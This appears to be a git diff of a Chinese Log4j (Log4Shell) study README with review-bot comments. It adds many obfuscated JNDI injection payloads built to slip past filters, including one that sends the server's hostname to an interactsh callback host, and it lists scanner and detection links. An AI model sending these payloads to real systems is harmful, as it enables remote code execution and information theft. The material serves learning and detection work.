22
33** Log4j影响实在太大了,本人开始写专项漏洞检测工具-永恒之恶龙。Star超过200[ 发布] ( https://github.com/Goqi/ELong ) !欢迎关注,感谢小星星!**
44
5- 本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月26日 。作者:[ 0e0w] ( https://github.com/0e0w/HackLog4j )
5+ 本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月28日 。作者:[ 0e0w] ( https://github.com/0e0w/HackLog4j )
66
77- [ 00-Log4j永恒恶龙] ( https://github.com/0e0w/HackLog4j#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99 )
88- [ 01-Log4j基础知识] ( https://github.com/0e0w/HackLog4j#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86 )
3030
3131** log4j + ? = rce !**
3232
33- - [] Apache Flink
34- - [] Apache Struts2
33+ - [x ] Apache Flink
34+ - [x ] Apache Struts2
3535- [ ] Apache Spark
36+ - [x] Apache Storm
3637- [ ] Apache Tomcat
3738- [x] Apache Solr
3839- [ ] Apache Dubbo
3940- [ ] Apache Druid
40- - [] Apache OFBiz
41- - [ ] flume
41+ - [x ] Apache OFBiz
42+ - [ ] Apache Flume
4243- [ ] Redis
43- - [ ] logstash
44+ - [ ] Logstash
4445- [ ] ElasticSearch
45- - [ ] kafka
46- - [ ] ghidra
46+ - [ ] Apache Kafka
47+ - [ ] Ghidra
4748- [ ] Spring-Boot-strater-log4j2
4849- [ ] VMware vCenter
4950- [ ] Minecraft
50- - [ ] Logstash
5151- ......
5252- https://fofa.so/static_pages/log4j2
5353- https://github.com/cisagov/log4j-affected-db
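Review bot: The ticked boxes added for Apache Flink, Apache Struts2 and Apache OFBiz are written `[x ]`, with a space before the closing bracket, while the new Apache Storm entry and the existing Apache Solr entry use `[x]`. GitHub task-list syntax only recognises `[x]` or `[ ]`, so these three will render as literal text instead of checked boxes. Change them to the `- [x] Apache Flink` form so the list reads consistently.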
7272一、Payload
7373
7474```
75- ${jndi:rmi://127.0.0.1/poc}
7675${jndi:ldap://127.0.0.1/poc}
76+ ${jndi:rmi://127.0.0.1/poc}
7777${jndi:dns://127.0.0.1/poc}
7878${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
7979${${::-j}ndi:rmi://127.0.0.1/poc}
@@ -111,9 +111,25 @@ ${jvmrunargs:ldap://127.0.0.1/poc}
111111${sys:ldap://127.0.0.1/poc}
112112${env:ldap://127.0.0.1/poc}
113113${log4j:ldap://127.0.0.1/poc}
114+ ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
115+ ${jndi:rmi://127.0.0.1}/
116+ ${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
117+ ${jndi:dns://127.0.0.1}
118+ ${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
119+ ${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
120+ ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
121+ ${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
122+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
123+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
124+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
125+ ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
126+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
127+ ${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
128+ ${jnd${upper:i}:ldap://127.0.0.1/poc}
129+ ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
130+ ${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
114131```
115132
116- - https://github.com/fullhunt/log4j-scan
117133- https://github.com/test502git/log4j-fuzz-head-poc
118134- https://github.com/woodpecker-appstore/log4j-payload-generator
119135- https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
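Review bot: The first added string, the one ending in `${hostName}.{{interactsh-url}}`, still carries an unexpanded `{{interactsh-url}}` template variable, whereas every other entry in this block uses the `127.0.0.1` placeholder. Normalise it to the same placeholder or label where it was copied from. The block also grows by 17 strings with no grouping or comment. A short note per group naming the lookup prefix it nests (`k8s`, `sd`, `lower`, `upper`, or the `:-` default form) would make the list far easier to use as test input for WAF and log-detection rules.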
@@ -131,6 +147,7 @@ ${log4j:ldap://127.0.0.1/poc}
131147- https://github.com/lijiejie/log4j2_vul_local_scanner
132148- https://github.com/palantir/log4j-sniffer
133149- https://github.com/mergebase/log4j-detector
150+ - https://www.t00ls.cc/thread-63931-1-1.html
134151
135152三、出网检测
136153
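Review bot: The added `https://www.t00ls.cc/thread-63931-1-1.html` entry is the only item in the visible list that is not a GitHub repository, and it is a bare URL with no title. Add a few words after the link saying what the thread covers, so a reader can tell why it sits next to the local scanners above it without opening it.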
@@ -165,9 +182,11 @@ ${log4j:ldap://127.0.0.1/poc}
165182- https://github.com/gh0stkey/Log4j2-RCE-Scanner
166183- https://github.com/p1n93r/Log4j2Scan
167184
168- 七、Host头检测
185+ 七、Header检测
169186
187+ - https://github.com/fullhunt/log4j-scan
170188- https://github.com/0xInfection/LogMePwn
189+ - https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
171190
172191八、请求参数检测
173192
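Review bot: Renaming the section heading from `七、Host头检测` to `七、Header检测` changes the anchor GitHub generates for it, and the README's table of contents at the top links to sections by heading anchor. Check whether any in-page link or external reference still points at the old heading and update it in the same commit. The move of `fullhunt/log4j-scan` from the payload list into this section is consistent with the new, broader title.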